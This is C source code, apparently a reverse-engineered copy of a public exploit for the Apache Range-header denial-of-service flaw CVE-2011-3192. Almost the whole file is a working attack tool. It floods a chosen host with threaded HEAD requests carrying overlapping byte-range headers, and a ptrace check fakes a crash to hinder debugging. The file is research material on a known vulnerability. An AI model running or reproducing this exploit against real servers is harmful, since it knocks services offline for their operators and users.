1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146 | /*
* This is a reverse engineered version of the exploit for CVE-2011-3192 made
* by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
* Copyright 2011 Ramon de C Valle <rcvalle@redhat.com>
*
* Compile with the following command:
* gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <pthread.h>
void ptrace_trap(void) __attribute__ ((constructor));
void
ptrace_trap(void) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
write(fileno(stdout), "Segmentation fault\n", 19);
exit(-1);
}
}
void
w4rn41dun14mu(int attr, int fg, int bg)
{
char command[13];
sprintf(command, "%c[%d;%d;%dm", 0x1b, attr, fg+30, bg+40);
printf("%s", command);
}
void
banner()
{
w4rn41dun14mu(0, 1, 0);
fwrite("Remote Apache Denial of Service Exploit by ev1lut10n\n", 53, 1,
stdout);
}
void
gime_er_mas()
{
printf("%c%s", 0x1b, "[2J");
printf("%c%s", 0x1b, "[1;1H");
puts("\nsorry dude there's an error...");
}
struct thread_info {
pthread_t thread_id;
int thread_num;
char *argv_string;
};
static void *
thread_start(void *arg)
{
struct thread_info *tinfo = (struct thread_info *) arg;
char hostname[64];
int j;
strcpy(hostname, tinfo->argv_string);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
s = getaddrinfo(hostname, "http", &hints, &result);
if (s != 0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s));
exit(EXIT_FAILURE);
}
for (rp = result; rp != NULL; rp = rp->ai_next) {
sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
if (sfd == -1)
continue;
if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
close(sfd);
}
if (result != NULL)
freeaddrinfo(result);
nwritten = write(sfd, "HEAD / HTTP/1.1\n"
"Host:localhost\n"
"Range:bytes=0-,0-\n"
"Accept-Encoding: gzip", 71);
if (nwritten == -1)
close(sfd);
usleep(300000);
j++;
}
return 0;
}
int
main(int argc, char *argv[])
{
int i;
struct thread_info tinfo;
banner();
if (argc <= 1) {
w4rn41dun14mu(0, 2, 0);
fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout);
return 0;
}
w4rn41dun14mu(0, 3, 0);
printf("[+] Attacking %s please wait in minutes ...\n", argv[1]);
while (1) {
i = 0;
while (i != 50) {
tinfo.thread_num = i;
tinfo.argv_string = argv[1];
pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);
usleep(500000);
i++;
}
}
}
|